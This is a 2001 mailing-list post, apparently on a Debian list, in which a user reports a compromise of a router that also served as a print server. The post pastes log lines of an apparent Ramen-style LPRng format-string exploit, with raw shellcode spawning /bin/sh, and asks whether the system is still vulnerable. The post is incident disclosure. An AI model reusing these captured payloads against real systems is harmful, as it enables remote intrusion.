Got hacked by Ramen-style attack
On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi all,
that's what I found in my logs after I had to reboot my
Router, which also worked as print server (Now I know better)
because of a DoS.
Nov 21 03:29:36 lan1 -- MARK --
Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line
'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u
%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍ
ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line
'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1
92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ
?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH
(and so on) - the lpr.log shows the same entries.
I searched the system for fragments of the Ramen worm after reboot but I
found
nothing
suspicious.
The attack seemed to come over nmbd, although all ports, exept inetd are
blocked to the
outside
vi ipchains. I had a number of rejected packets to port 137 immediately
before,
nmbd crashed
and
the lprng exploit started.
So there are some questions, I would like to pose :
Is Woody's lprng still vulnerable ? I've got the latest version.
Is the shown exploit a sign that someone already was in there, or just for
an
attempt
?
Can I find possible backdoors, or will I have to re-install ?
Thanks,
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je
ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t
=8csx
-----END PGP SIGNATURE-----
--
Things are more like they are today than they ever were before.
-- Dwight Eisenhower
Reply to: